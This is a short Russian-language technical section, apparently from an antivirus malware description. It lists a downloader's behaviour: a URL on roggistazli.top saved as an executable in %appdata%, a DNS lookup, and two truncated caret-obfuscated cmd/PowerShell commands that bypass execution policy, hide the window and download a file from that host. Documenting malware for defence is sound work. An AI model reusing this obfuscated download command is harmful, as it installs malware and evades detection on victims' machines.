Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWEr^ShELl.^exE ^-^E^xEC^u^t^I^o^nPOL^icY^ B^Y^pa^SS ^-n^O^ProfIlE -^WINd^ow^S^T^yLe ^hIDdeN^ (^N^Ew-oBjecT^ SYsTem.Net.we^bClI^ENt^).dOW^NLOa^Df^iLe(^'http://roggistazli.top/se...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /C "p^OWEr^ShELl.^exE ^-^E^xEC^u^t^I^o^nPOL^icY^ B^Y^pa^SS ^-n^O^ProfIlE -^WINd^ow^S^T^yLe ^hIDdeN^ (^N^Ew-oBjecT^ SYsTem.Net.we^bClI^ENt^).dOW^NLOa^Df^iLe(^'http://roggistazli.top/se...' (со скрытым окном)